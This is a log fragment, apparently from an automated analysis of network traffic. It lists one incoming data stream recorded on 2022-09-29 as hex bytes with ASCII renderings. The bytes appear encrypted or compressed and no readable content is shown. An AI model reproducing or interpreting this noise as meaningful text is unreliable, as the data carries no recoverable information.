                                                                                                                                                    2022-09-29 13:00:19 UTC38462INData Raw: 9f 8c 81 5a e1 61 65 95 8f cc a2 6e e0 37 5b 40 bf cf de df 7f 30 4e c4 a4 a4 14 6c a5 a4 3e 3b 32 39 ff 30 2f c3 ed af 76 75 0a a1 44 6b d1 d5 e7 ce 30 e9 f3 b2 51 21 30 02 31 4a 3a f3 7d 4c 47 9f 37 81 61 20 f0 24 e0 40 e2 f4 11 69 06 c1 e5 da 68 f6 69 da f1 a8 6a f0 d5 a3 85 b1 b1 09 83 b7 cb 7a 5c 58 d7 9d 8e c4 83 37 08 26 88 ca 0b bd 39 13 32 c4 8f 4a 58 c4 bc bb b9 ec bb fd 1a 09 ac ed 3b 04 a3 46 1a ed 64 16 1a f8 bd ba 5e d2 6b cb 90 6c 03 35 4f 84 50 70 ad 4a d0 df 47 d5 45 6b af 9d d4 e0 9b 68 3f 90 45 96 04 05 49 ea 2d 74 67 09 3f f6 24 51 df 6c 99 ec c5 8c f6 9d 59 93 1f 24 5d 0c 81 bb 8a c2 bc 3b 5d 69 ba 18 5e f1 aa 37 5c a9 5b d7 6f 6c 1c ba 02 d0 af 63 c7 70 af 52 c8 45 95 ee 6b 4d 68 57 cc c4 33 db 39 a3 05 b7 b7 6e 10 0b 85 9f aa 69 12
                                                                                                                                                    Data Ascii: Zaen7[@0Nl>;290/vuDk0Q!01J:}LG7a $@ihijz\X7&92JX;Fd^kl5OPpJGEkh?EI-tg?$QlY$];]i^7\[olcpREkMhW39ni
                                                                                                                                                    2022-09-29 13:00:19 UTC38478INData Raw: 11 1b be 72 2a 9b ac 24 a6 6f d8 66 50 56 81 1f 92 36 08 2a 93 7a dd 7d 06 0e 44 95 94 0a 7e 98 74 6f fa db 94 31 1c c4 1f b4 1d 86 a4 a1 d1 e1 40 d4 9d ad 4b 7d 69 4c f8 2b 15 ac 29 1f c3 92 8c 8c c3 d5 39 a7 cb ce 0a 54 1b 9c 7a 06 85 95 e4 1f a6 6d 48 ba d3 e7 ec e4 f7 d9 e6 03 bf ea e1 48 7f fc 76 cd 8d e7 d5 6f 81 b0 40 29 89 24 11 52 7a c4 89 a8 dd ca 01 9b 14 cd 66 89 e5 5b 32 ef 55 90 2d 79 f7 ae 4f 50 2c 2d 9d da a7 a3 ee f8 e5 2e 08 2d 9f e0 7e 3e 38 67 38 30 2a 9c de 08 b3 ba aa 0d da 44 d4 22 04 bc 5f 6b 86 76 73 da 6a 0c 5c c5 7f 72 5e 25 dc 19 fa 32 9a 0d b2 94 07 a0 01 18 eb a7 77 02 48 54 66 d4 06 42 86 45 c6 28 97 b7 29 76 b6 e9 77 3d ec 66 42 ba bb 7d 87 b2 e0 b3 26 05 14 57 20 e7 ed 14 2e b6 0b 80 70 2b 3c d2 30 8d 0b 60 28 c3 23 b3 31
                                                                                                                                                    Data Ascii: r*$ofPV6*z}D~to1@K}iL+)9TzmHHvo@)$Rzf[2U-yOP,-.-~>8g80*D"_kvsj\r^%2wHTfBE()vw=fB}&W .p+<0`(#1
                                                                                                                                                    2022-09-29 13:00:19 UTC38494INData Raw: 4c 03 ef 99 74 d7 04 e0 e0 eb 91 00 43 79 ac f2 18 2a f3 47 5c d6 d7 27 b0 25 da 87 01 ba 70 e4 5a ff 63 9d d6 b7 ae d1 3c 37 78 cb a8 7f b9 75 b1 29 51 83 cb 06 19 40 74 c2 3b a8 21 2d 7e 8d 82 40 19 00 9f e0 6f 41 20 76 0a a7 3a a1 e5 90 94 2e 75 f5 05 9f 6a 18 d2 46 7a e2 78 47 0c 9c ac 7c 38 b9 3a c9 63 9a a9 2a 81 83 a3 45 01 b0 55 f6 81 42 82 16 05 e0 a3 b3 3e 51 e1 af 65 81 69 99 94 a2 4f 08 0e 28 5f c1 e8 85 9c 79 f3 99 b6 11 eb 2d 99 23 be 0b d0 2a 65 12 97 15 6f a3 57 3b 09 1a 94 1e 0f e4 c6 12 87 fb aa 4b 26 7d e0 e3 40 ba 57 4d ee 09 67 a3 a0 19 71 43 ac bf 27 71 d4 ef 7c 09 e3 7e 45 fe a1 00 d9 c7 41 71 79 0b 2c ad 50 7f c3 31 25 2d 2f 1c 3f a5 b0 43 5a c4 8c f2 72 70 fe 91 a4 53 8d 0e cc 34 f2 2c 8e ce 3a 82 07 4a fd 47 4f 20 c4 80 fe 78 e6
                                                                                                                                                    Data Ascii: LtCy*G\'%pZc<7xu)Q@t;!-~@oA v:.ujFzxG|8:c*EUB>QeiO(_y-#*eoW;K&}@WMgqC'q|~EAqy,P1%-/?CZrpS4,:JGO x
                                                                                                                                                    2022-09-29 13:00:19 UTC38510INData Raw: a6 bf 07 22 95 8f 84 94 f9 f2 00 f4 0d f9 f4 e9 ab 4a 6a aa a8 af e8 ce d6 75 e0 e4 13 2f 28 e3 71 79 43 65 a2 dc 48 b3 74 9a ab e5 6f df 91 5f 22 88 d4 20 57 c7 d6 53 06 78 a9 21 9f 02 23 7d e4 59 1f c2 93 37 e8 9e da 71 57 25 8c ba c2 c4 79 44 67 a5 de c3 e9 47 e8 65 79 14 d4 92 2d 63 2d 75 0b 89 a3 8f c7 ab 8b d4 c5 8d 41 f4 03 b0 e1 e5 ec 74 82 a7 60 43 12 cd 63 97 34 81 68 24 b0 c9 15 f9 ad b8 c8 24 b4 c6 de d5 d7 05 bd 03 f7 6e b9 6f bc e5 8a 54 38 77 b7 b4 e2 bd a3 d9 3f 83 d9 42 8b fc a4 6d e0 91 ac 50 c7 ea e8 47 50 75 88 23 37 cd 02 fc 48 24 97 e7 3b 34 22 92 bd 19 16 1f 42 f8 06 c4 d9 a3 88 b1 70 7f 5c 0e d7 28 f2 43 2c b1 92 65 80 85 7a a6 a1 6d 73 c1 c7 38 3a fb c6 ef e5 98 35 22 37 b4 9c b9 68 a1 22 75 eb c7 e3 e4 74 fa 7f c8 f2 b5 98 16 ed
                                                                                                                                                    Data Ascii: "Jju/(qyCeHto_" WSx!#}Y7qW%yDgGey-c-uAt`Cc4h$$noT8w?BmPGPu#7H$;4"Bp\(C,ezms8:5"7h"ut
                                                                                                                                                    2022-09-29 13:00:19 UTC38526INData Raw: 5e 17 75 6c b3 25 52 16 be 6b cf 2f 3b 84 7a 4f 54 34 3b 54 7c 87 fc 4d df e5 3a 95 42 56 ce c9 3e 90 0a 0b 3c 46 db 0d 38 e7 ea f2 18 b5 cf 4e 58 24 da d8 2f 04 e3 68 58 66 28 6e e1 1f a4 6b 82 f5 5c a5 37 ee 55 3f 21 6a 76 dd f3 aa f5 b0 39 c4 e5 11 15 c1 3a d4 eb e0 92 3a 9c 27 40 2b d2 a0 ae 4e fe 70 be d0 12 fc 5b cc 92 99 5c 2e be 14 e1 1e fd 43 7f f1 b3 64 a6 24 11 d1 93 94 4e ac 26 fe 9b 8a f3 95 b7 ba 6c 50 41 e3 8c b6 19 51 66 ae a9 70 a0 55 63 36 69 87 e6 d7 cc f4 56 9e fc a7 c3 26 7b ce 62 2e 69 99 e1 6d ab c0 da 7d d4 8c 28 2a 46 51 04 70 84 f3 46 d6 24 44 1f 4b 21 99 5c 43 29 c0 f5 4b b4 51 cd 91 f5 fb 2d f8 ec 50 28 19 63 d2 3d 75 a9 d5 58 8f b1 f6 5b d6 da 8c 50 5a eb 7a 9e 1b 8f 72 2a 12 cd 5f d1 27 32 74 28 1b f9 31 29 82 cd e6 8a 89 5e
                                                                                                                                                    Data Ascii: ^ul%Rk/;zOT4;T|M:BV><F8NX$/hXf(nk\7U?!jv9::'@+Np[\.Cd$N&lPAQfpUc6iV&{b.im}(*FQpF$DK!\C)KQ-P(c=uX[PZzr*_'2t(1)^
                                                                                                                                                    2022-09-29 13:00:19 UTC38542INData Raw: a1 20 33 b9 bc 0f 2d 4e e4 00 ff 62 35 f6 95 ca cd 09 9f 09 89 a6 52 2d e9 b4 39 1a ca fa f3 cb 0e fd 04 46 f2 e0 25 20 49 bb 66 e4 bd 4a c1 76 bb a5 05 1e e4 d3 02 09 b2 5d f8 86 48 d2 8d 6f e4 62 e9 31 8b ce 64 18 5c dd 0c e0 56 9b a1 44 29 4e 19 4c 8a 3e f2 77 0f e8 ed bd 61 7c ac 55 6e 1a a8 72 90 08 67 f5 96 57 55 bd d9 16 71 e2 bf f5 b9 70 80 9d 01 11 bb 8f f3 35 fa 3d b4 3a 03 7f 03 de 61 5c 3e 35 ce c3 c7 83 c7 b4 9d 09 48 49 55 2e 3b af 9a c0 35 7e b2 00 d6 d7 93 e9 7a 93 e6 2f c3 e4 5f 8f 7c 2d 61 90 54 ed 67 e8 8d d0 a5 28 ab b7 09 39 90 b1 cc 90 d7 d6 ae 5f b8 f4 71 4a fd b3 c6 86 6b f7 c7 29 3f cb f1 c5 e7 f4 a9 79 f4 f6 5d 76 a0 82 ef 0a 9a 89 37 d1 25 ac 05 03 d0 ba 88 f3 ae de 7c d5 5c 7f e6 2d c0 a1 c3 93 12 b7 3d 82 bc c4 86 41 3c fc 60
                                                                                                                                                    Data Ascii: 3-Nb5R-9F% IfJv]Hob1d\VD)NL>wa|UnrgWUqp5=:a\>5HIU.;5~z/_|-aTg(9_qJk)?y]v7%|\-=A<`
                                                                                                                                                    2022-09-29 13:00:19 UTC38558INData Raw: b7 ba 56 66 0c bc e3 9e 76 70 03 46 37 25 20 fb ea bf 06 bf f6 ae 71 db d3 d0 a3 52 4a d3 23 c9 b8 98 9a b9 da 3c 4b 10 c3 d4 f4 dd 7d 53 37 a0 0d cf 67 d9 97 19 6d 33 c6 6e 65 a1 a5 c3 0e bd c2 fe ab 79 ae 90 06 8e 80 90 45 41 87 0a 7c 18 88 96 92 8b 9e 70 5d 8f 0e fd f3 2f b0 14 69 ec 72 f6 dc fa f0 18 68 59 ce 81 fd d6 ed 16 ba f5 4f e5 bf bf 9f 6e 81 89 12 83 97 ac a3 12 d8 52 3c 9b 41 b8 3c f9 39 3c df 8a 81 30 fd ff 81 d1 68 2b b2 8e d4 16 6e 6e ee 3f 9a 53 3a ae a9 08 ef 41 10 ab 64 8b 81 1c 2f 2d 13 7e ad 74 6f 1f 6e e1 bb 72 d6 13 bb a1 72 a3 52 51 e5 b7 89 ac 7c c4 98 1e 97 c1 23 4e 51 b8 fe 3c 0e d9 6c d1 8c 31 26 c4 0b e3 8e 76 4a 04 f3 ff 70 b8 87 00 30 5d 17 49 84 e2 02 59 eb 05 16 23 5a 56 ab 58 89 5b 6a a4 7c c3 21 1e a2 0a d4 b6 98 db f4
                                                                                                                                                    Data Ascii: VfvpF7% qRJ#<K}S7gm3neyEA|p]/irhYOnR<A<9<0h+nn?S:Ad/-~tonrrRQ|#NQ<l1&vJp0]IY#ZVX[j|!
                                                                                                                                                    2022-09-29 13:00:19 UTC38574INData Raw: 82 07 ac ab 49 58 1f b3 d4 0e ab c0 f2 fb a5 38 3d f9 52 5f f4 0e 6d 64 0a 5f 5f a4 e5 a0 c8 d8 92 f8 59 71 5d 11 27 ef f1 23 2d cf 16 5c 0d e4 cc 86 ec 72 da 98 5e 3b 73 56 23 79 60 65 6c f7 6f 4a 92 d7 0c 60 cf 05 ec 4e 83 cc e1 7a 29 9d d8 be de 46 37 4a 6d 51 0a c9 fb 10 81 cf e9 fb fd a8 7b c5 71 ea 50 6e 9e 29 2d 15 09 b9 01 55 a6 88 04 a4 0a be 56 21 59 c7 29 2c 97 7d 7e 68 2e 45 bf ad 41 cd 30 95 f3 27 7f 33 2e 98 4f 0c ec 0c b0 d8 07 ee f7 16 73 f7 7b 94 4d 89 73 d2 25 b3 3a 2c 5c 15 b7 40 55 71 e1 59 39 d4 5f af 8f 0d 74 21 d6 60 b9 61 a4 45 e3 a3 db ed 95 33 b1 b8 a8 08 f2 3a 9d 09 89 29 97 72 00 d9 35 ff 87 d2 b8 e8 d2 20 3e a2 b8 67 d4 3d 0b 1c 91 e7 ab f9 9a 78 aa bf 22 35 15 84 83 98 3d 48 4a 3d da c5 14 c1 4b e3 08 b9 cf f6 6d 08 32 ec 3b
                                                                                                                                                    Data Ascii: IX8=R_md__Yq]'#-\r^;sV#y`eloJ`Nz)F7JmQ{qPn)-UV!Y),}~h.EA0'3.Os{Ms%:,\@UqY9_t!`aE3:)r5 >g=x"5=HJ=Km2;
                                                                                                                                                    2022-09-29 13:00:19 UTC38590INData Raw: 4a b7 fa ea 21 46 9a 5a 48 f2 61 97 a8 f0 ed aa 5a 35 6a 3f 65 29 f4 87 9a 1e dd 3b 89 de 41 f4 19 2c be 62 e5 f1 05 0c b0 c1 aa 18 46 6e d2 42 0e 4f e2 1d 3d 90 c5 da 3c 02 4f 44 ed 25 e4 81 98 59 52 bc 40 4e 11 79 33 f5 0b 74 db cd a5 9a 21 65 01 b1 51 b2 76 47 b9 be bc 8d 4f fd 4c 48 6a d4 0b 13 21 90 5c 5d 80 eb af fc d7 11 7e 21 22 39 46 fd f6 27 fc cc e8 26 53 74 0c 72 38 fb 5d b5 ce 9c 4c 75 60 f6 84 17 23 d7 bd fa ad 9d 16 62 9b ce 07 b9 04 79 56 67 d2 8b 79 38 b5 9c 74 5b 5e 43 64 62 2a cf 30 30 05 6f e7 9d 2b 4b 4e ac 01 52 63 74 0d 41 8c 79 12 79 6b 36 a7 55 a3 22 e9 6f f8 8e 8d 0b 73 83 10 5e b4 6c fe b1 b3 b8 ab 0f 84 fa a3 67 d9 ca 8d c2 e9 b0 67 a4 46 51 1e 40 d4 0e ba 2e 96 ac 57 b6 11 b7 fc 9b 6b 5e 89 c3 d5 97 f2 f2 bc b6 1e 2b e6 aa 50
                                                                                                                                                    Data Ascii: J!FZHaZ5j?e);A,bFnBO=<OD%YR@Ny3t!eQvGOLHj!\]~!"9F'&Str8]Lu`#byVgy8t[^Cdb*00o+KNRctAyyk6U"os^lggFQ@.Wk^+P
                                                                                                                                                    2022-09-29 13:00:19 UTC38606INData Raw: a5 3d 82 9f 32 24 34 5c d1 a6 e8 6b e5 29 ed 9d 0a 0a e0 da 92 4b e7 d7 d7 5d 09 11 8d 70 3a a4 fb 79 2a 33 ac b9 ec 3b 96 60 2f 22 e4 4b 4b ad 09 ea c6 3e 7e 8b 7a 36 4c d5 36 19 75 ad 6e 7f 11 ac 70 47 2e b8 ed 67 61 bc 27 db e2 60 dd 6b 39 9f f4 40 e7 e3 ab d4 d9 87 cd c6 35 1f 0f f9 df cc 98 f3 4b 81 99 8e b2 d1 21 15 eb 75 2a ec 61 65 2d 48 e8 98 10 2d dd 97 aa 5a 6f 0f fe 2b 49 57 bb 73 22 75 3f cb 50 f3 4c 06 d2 36 bd 5b ba 9c 64 c2 29 b5 c1 ef 55 9e fd c8 d1 9b 86 e8 01 32 94 d0 1e 66 f1 46 de 2b bb c7 5a 04 c1 da 8b 04 7a 51 62 3f 51 78 a8 30 af 61 9b 03 76 b6 0e 48 f6 44 ae 90 6f 47 a0 13 0b 24 c8 fd 3f f9 95 4c 4b 0d 2f d9 66 14 a0 f7 c1 06 6d a1 d8 1b 83 f9 7b 6b ea 01 9e 6d 47 90 41 f6 5a 45 a6 1b 52 09 89 7b 86 5e cd 61 15 6f ca 8d b8 96 c8
                                                                                                                                                    Data Ascii: =2$4\k)K]p:y*3;`/"KK>~z6L6unpG.ga'`k9@5K!u*ae-H-Zo+IWs"u?PL6[d)U2fF+ZzQb?Qx0avHDoG$?LK/fm{kmGAZER{^ao
                                                                                                                                                    2022-09-29 13:00:19 UTC38622INData Raw: 92 8b 0c b3 1b 22 92 6f 65 81 de 60 43 67 70 38 ae 18 5c df fc 68 6a d6 d4 a1 85 ef 1a b8 ef 8b 35 bb c5 49 ca 46 88 8a 43 1d 20 a1 eb 41 a2 89 ff 37 bc 8b ee d2 84 6c 51 7e c4 fb 96 e2 85 03 a3 a1 23 f0 b3 c2 69 02 0d c9 c2 62 5f 00 fe 0d 57 49 f6 f3 a2 af c0 43 b6 7a 90 aa cd 29 50 20 b1 f8 5a 86 28 6d ee 66 33 6e b6 29 32 28 7c 0a b5 1f 0a 88 44 05 2f c1 41 55 53 e8 e8 fd 33 0a 08 49 e5 88 f5 cd c4 9d be 28 20 81 8a 19 db ee 31 95 5a 92 f1 6d f8 4c 53 48 ba ed eb 99 73 7a 56 2a f7 6f 86 db 7f 90 f8 24 81 52 08 ed d3 43 9a 53 a5 06 a3 4f 01 1c 71 d2 33 d0 a5 84 d7 59 22 4d e7 a3 62 d5 13 dc 0c 1d e4 37 e7 9d 5f 32 40 05 f9 39 90 37 65 18 da ce ab eb be 8e 21 06 a3 41 af 27 97 68 30 da 3a 0d 26 8e 2a cb 4a 51 b5 6d f7 7f 74 9c 19 1c 17 04 41 46 b4 56 83
                                                                                                                                                    Data Ascii: "oe`Cgp8\hj5IFC A7lQ~#ib_WICz)P Z(mf3n)2(|D/AUS3I( 1ZmLSHszV*o$RCSOq3Y"Mb7_2@97e!A'h0:&*JQmtAFV
                                                                                                                                                    2022-09-29 13:00:19 UTC38631INData Raw: b6 99 00 1e 44 bc 72 e4 68 c1 8e cb 5c 99 bc c6 e8 19 6c ee 00 4a 7c d0 9c da c6 a1 c2 c1 d8 94 81 24 49 c5 03 59 64 11 b9 12 a6 88 e1 42 6e dc 85 9d 1f 96 90 35 9a b8 cd bd 88 c5 23 2f b7 7e 37 21 a8 c3 ff 7c 3a 7a 29 0c e7 0b 07 55 21 cf 8c 28 55 c4 6e 9a 14 fe fd 3d fc 78 bc 99 13 15 f9 55 99 a0 4c d0 97 39 12 50 4d 1d 63 fb a8 88 87 06 41 af eb a8 aa 2f 89 c2 3d d7 61 7c 52 6a a5 ec ca 25 c3 46 a3 84 01 5f 70 9f e0 8a 82 63 29 4f 53 27 b3 8d c9 2c af 27 6d e3 a9 a8 ac f4 b5 28 20 13 0f 3a 91 0c 29 88 58 66 f7 d4 e7 ad c6 9b f2 07 84 31 1d 56 0b 5a f8 7a ab c5 33 52 dc 71 93 90 94 60 2f 6c df 67 f8 fc 60 c4 b8 a6 dd 10 a2 e7 fd 6a 73 e1 a3 6c e2 b2 82 e2 e0 fb 96 af 46 21 97 96 cc 48 9a 47 19 85 02 69 07 44 93 ce e1 1b fa af 2e 95 ad db 60 a0 a4 6f f0
                                                                                                                                                    Data Ascii: Drh\lJ|$IYdBn5#/~7!|:z)U!(Un=xUL9PMcA/=a|Rj%F_pc)OS','m( :)Xf1VZz3Rq`/lg`jslF!HGiD.`o
                                                                                                                                                    2022-09-29 13:00:19 UTC38647INData Raw: 39 89 53 e4 fb 8e 75 c7 1d 43 23 52 ea d9 12 c0 94 04 72 ab ef f8 ad ef 47 9c a6 dd 7b c8 2d d1 3c a2 f2 e3 5f 8d c1 a5 d9 76 63 e1 aa ed 59 45 86 27 86 90 76 1b 49 fe e8 f3 b5 84 3e 86 fb 24 48 78 59 10 6d ed d5 32 ff 1a 6a 55 01 34 69 dd 6c 3f 26 c9 fa 9b d8 05 28 1c ff 96 25 c7 c0 22 9b ba e9 70 ff 04 2f 6c 06 a0 7b ea ee bc 62 47 0a be 40 e3 e9 21 18 d6 c5 fa 3c 5e 34 ee d6 76 70 71 6c d2 a7 20 b8 c7 dc 81 96 ed 51 04 65 37 89 56 90 89 c1 92 30 f9 c3 4e e6 28 a9 38 aa 4e e6 c7 b7 5b d9 f5 ca 03 b9 d2 e2 a8 8e bd f0 0b e0 ea c5 ed a4 e3 11 ce b6 bf 28 e9 6e 7e 39 36 a3 e4 c4 65 b2 b9 5c 01 bf 3f 00 08 88 3f 88 d0 ff 57 fa 94 79 40 97 46 c2 16 18 ab a7 2d 12 ab f2 01 6c b7 d4 5b 6f e2 ba fe ff 9c a7 ff be d2 a3 52 78 2a 2d 55 63 a3 3c d3 ad f9 1d be 54
                                                                                                                                                    Data Ascii: 9SuC#RrG{-<_vcYE'vI>$HxYm2jU4il?&(%"p/l{bG@!<^4vpql Qe7V0N(8N[(n~96e\??Wy@F-l[oRx*-Uc<T
                                                                                                                                                    2022-09-29 13:00:19 UTC38663INData Raw: 42 16 68 7b c0 b1 db 7d e7 10 24 5a e5 c2 85 f2 90 ac c7 40 dc 90 3c ae ad 73 24 6f 9d ac 86 d5 44 f9 cf 14 a0 a4 49 98 15 0c e2 8c f0 a3 21 d6 d1 0f c9 e1 e1 b6 a9 4f 1c 3f fb b8 70 6e b6 e1 03 0a 62 d8 be 7c ff b5 fc 51 84 d6 b1 6c 0e de c0 77 df d7 34 69 fc c9 a4 6d db af ec 1b 92 42 b2 62 3d 49 f5 65 aa cd ae 21 69 74 d6 f3 a7 b4 e0 8f 2d ac 69 1c 20 26 0b f8 8a 4f 48 3b 85 f4 11 4b 42 ed 6e a5 d2 e2 4e c9 5d 10 53 29 4b 92 e0 be fa c0 fc ef 2d de ae 41 b3 bc 8c 43 c5 0d 5d 07 3a a6 1d 8d 6c 9b 29 f1 9a 5d 2b 4e b3 96 da e7 ed 84 16 4d a2 7f 8e 5d bf a3 e0 43 49 24 7b 02 db bb d6 93 96 cd 27 78 b3 6b 72 38 0a 3a fb 53 74 ca 29 59 bc fb 46 b9 86 d0 e9 95 9b 63 47 1e c6 c6 49 e7 30 bf c0 df e3 83 bc ae 6b df ac 19 9c f2 52 c0 5f 9a 66 1d 39 41 11 58 aa
                                                                                                                                                    Data Ascii: Bh{}$Z@<s$oDI!O?pnb|Qlw4imBb=Ie!it-i &OH;KBnN]S)K-AC]:l)]+NM]CI${'xkr8:St)YFcGI0kR_f9AX
                                                                                                                                                    2022-09-29 13:00:19 UTC38679INData Raw: 72 ee ba fd cc 9c bd c3 4e 55 a7 63 d0 86 9d 8b 99 68 6b 69 f4 24 74 d2 30 8f 2b 58 03 cf f6 65 f7 49 ae 4d 71 a6 1b b9 40 50 a0 70 05 f6 93 2d f9 05 5b 26 c0 87 e6 d0 83 99 8b ac dc ef 50 cc bf 3e fb 0f ce 6e 75 12 da b9 bf 71 63 69 fc 8d 90 48 34 ca a1 08 ee 6c 4b 52 34 18 70 45 25 14 17 65 ff c8 41 d8 2e c7 d4 80 94 b3 f6 7f cb a9 e6 f7 a8 a9 0c df 50 a3 4e 2c 85 c5 05 ea f0 95 29 95 a1 0d ad df c9 1e 26 fe 1d 3e e0 eb ae 77 8d 7e b6 41 5f 12 c3 ab 4c 9e 49 8e b7 fd 39 3c 0b 41 cb 66 d0 fd 5f 99 f8 ae b4 1a f7 b0 7f d8 a2 c3 99 d0 59 e6 42 52 b3 f3 53 fd 1c 1f f3 05 a7 b1 5f 0a e3 f0 92 28 a6 9f 96 30 4b 85 b8 71 24 03 28 f8 e2 fb c5 1a 1f ca 40 34 32 7f c8 f8 34 93 d6 61 c1 8c 8b d2 c6 93 50 dd 1a 44 b5 34 79 db 97 bd c2 85 3d 0a d3 2a 67 bf f4 32 93
                                                                                                                                                    Data Ascii: rNUchki$t0+XeIMq@Pp-[&P>nuqciH4lKR4pE%eA.PN,)&>w~A_LI9<Af_YBRS_(0Kq$(@424aPD4y=*g2
                                                                                                                                                    2022-09-29 13:00:19 UTC38695INData Raw: a7 bc 1b e7 4d 1a 9e c4 1a 3b b3 01 80 d3 e6 8d 37 53 68 3a 36 2f f9 ac f1 be ba cd e3 15 04 81 fb bf 53 e8 48 79 ac a6 fd 96 94 9b 90 5a dd 97 02 67 cf 2c 31 9c 6d 58 69 a4 b0 6a fc df 2a 53 2a 46 70 53 fa e3 b1 bb 1a f4 b0 1c b9 ce fb 6b 4e 23 19 b6 57 9e b9 1c bb dc 4b 13 6f ea 94 99 1d ed ed 05 4c 20 4d ad f7 2c 46 ce b8 af cc 78 27 07 e6 f6 b7 0d a4 cc 1a 60 99 c9 33 38 16 d3 7b bd 4b ed d2 9f 85 c1 2e c8 e1 33 2d 7b 56 b4 a8 dc 0d 0a a2 3d 13 9c 5c 90 d6 17 01 fd 5d 96 46 dd f8 4e 03 a9 7d 15 84 e4 f7 b2 4f 34 49 e2 3d 4b 31 85 14 a5 b1 8f da e8 c5 1d 81 ec 04 09 2f 81 21 ce 54 0e c7 40 36 ab 90 89 94 e1 bf f2 fc a6 89 10 60 40 ee db 31 2b 41 c8 ff da 5e ad a6 b1 45 b4 ed fe 89 b4 02 ca 63 c5 46 bf 19 b9 e7 1c e9 83 78 ee fd 7f 9d 1a 2e df a1 81 f5
                                                                                                                                                    Data Ascii: M;7Sh:6/SHyZg,1mXij*S*FpSkN#WKoL M,Fx'`38{K.3-{V=\]FN}O4I=K1/!T@6`@1+A^EcFx.
                                                                                                                                                    2022-09-29 13:00:19 UTC38711INData Raw: 8b 6d 9b f4 38 89 f4 56 77 6b f2 bc 49 f3 b8 e8 ba 99 7d 9a ed d2 28 38 09 a5 94 9f 6b da e4 66 b4 ff 2e 44 d5 f8 c9 fd ea 54 5a 97 95 47 60 4c 8c 28 37 d6 08 9a 25 93 d8 3b b0 5c 25 e2 1f 91 cc 89 11 34 07 04 4b 63 80 91 eb eb 9a d6 b2 64 6f 51 ff 0f 6e 69 ab 2a fa 8c 47 4d 15 95 43 7e 29 4c c3 72 8e 65 69 43 01 9a 20 69 d8 ce fd 19 31 b6 e6 40 3b 43 be 95 82 cf 54 8b 60 fb 37 7d f3 cc ac 2d ba 4b 27 b5 95 32 cf 04 6b 4e c9 f9 df 27 2e e5 48 ac 79 c6 bf ea 45 1b 88 1c a0 77 de 4a 14 dd df d8 fa 2b c5 c8 8d 04 56 eb d1 f3 e4 53 72 9e 6d 7e b2 ad b1 d9 32 5f 46 6b a6 fa ea 8a 6f ab 71 9f 71 34 c6 41 ef 76 a0 d2 8b 39 65 c3 4a 6a 98 a1 99 9a 69 13 50 67 92 a0 1a 3c 29 dc d7 a2 cc 7c 96 28 0c a1 fd 72 96 8b bf a8 d9 bb ab 09 90 c8 8e ed 45 62 fb 23 e4 7d 82
                                                                                                                                                    Data Ascii: m8VwkI}(8kf.DTZG`L(7%;\%4KcdoQni*GMC~)LreiC i1@;CT`7}-K'2kN'.HyEwJ+VSrm~2_Fkoqq4Av9eJjiPg<)|(rEb#}
                                                                                                                                                    2022-09-29 13:00:19 UTC38727INData Raw: d2 e9 66 6b 1b d4 0e f7 a6 f7 97 f2 66 41 3d 26 29 bc 5b 32 82 78 b3 b1 7e ef a5 2b 1b 04 51 1b 6b 1b 41 ec 19 66 b3 48 08 37 ae c6 9f ab 95 8b f7 53 3f 2a 30 66 a8 b8 55 94 bc c0 5b 53 54 da 48 87 0a dd 6a fd de f4 ff ec 44 6d ec 03 5e 9a e5 cf c6 99 4e a0 a2 25 f8 f7 ac bd 27 07 1a 6c 7c 52 64 f2 8b a6 95 81 63 62 45 76 79 64 ed 58 ed 94 51 51 7a 7d d5 d1 85 16 ed bf 2e 12 92 2d 4d 39 61 60 52 ec 57 92 80 a2 2c 94 dc 12 71 ce 72 cd c2 3c 72 01 9b ee 01 57 ae 9a 52 55 c3 8b 4f 38 25 06 36 8c c6 7d eb 9e e7 13 88 99 4e d2 4b 4c 16 20 b9 e2 20 28 d2 e7 e2 c9 e5 4f 70 b7 83 c5 0e 7a e4 68 74 a1 c0 99 66 a6 87 ea 64 c1 c9 23 ef 44 6a 5d 18 de 3d 08 f2 b3 b5 1a 17 b7 22 60 f8 ed f9 e6 c1 27 ae 5f c2 78 ca 55 78 1d 6c 06 cf 32 55 ea 8c 73 65 84 40 75 c6 48 61
                                                                                                                                                    Data Ascii: fkfA=&)[2x~+QkAfH7S?*0fU[STHjDm^N%'l|RdcbEvydXQQz}.-M9a`RW,qr<rWRUO8%6}NKL (Opzhtfd#Dj]="`'_xUxl2Use@uHa
                                                                                                                                                    2022-09-29 13:00:19 UTC38743INData Raw: 25 f1 23 15 4a fb df 8c 18 8f 2f 39 7e f9 66 53 a2 e5 ed 16 1a b8 be d7 60 d7 81 35 91 15 9d 63 60 0c 7a 42 ac ce a1 e7 a9 12 54 13 69 54 45 38 ad 30 71 79 6c 20 74 44 2a c0 33 37 ff 7c 2b 17 4f 0a 61 56 f1 4a b6 c2 77 67 56 94 13 a4 78 1a 29 51 47 9f fb 62 0a d3 05 5f 68 14 cb c5 56 72 a0 6c dd 42 fb 9f fc d9 91 98 84 21 4d db 85 4d 99 a8 26 48 42 52 61 30 91 56 6e bb 50 4f a9 4f 9b c9 cd 2f 4f 6d bc 72 26 fd 03 e6 f0 25 a4 c2 6b 75 4d b2 90 fe ba c6 e0 53 da 58 f6 dd 9a 8c ff 8b 6a 12 df de 07 15 ee f5 cd e1 34 52 db fb 41 ec ee 01 07 6d 7f f3 a8 5a f6 c5 b7 18 10 60 69 66 43 fb 97 19 2a 7d 57 da 0e a3 17 8c e5 c0 f5 14 d7 a9 8a 02 52 88 25 bc ef 8e ba de 6d 81 2f 90 31 99 77 3f de 39 ba 7a b5 fa d2 68 84 70 66 e4 b5 f7 6c ac b0 9c 58 20 c2 0c 44 18 63
                                                                                                                                                    Data Ascii: %#J/9~fS`5c`zBTiTE80qyl tD*37|+OaVJwgVx)QGb_hVrlB!MM&HBRa0VnPOO/Omr&%kuMSXj4RAmZ`ifC*}WR%m/1w?9zhpflX Dc
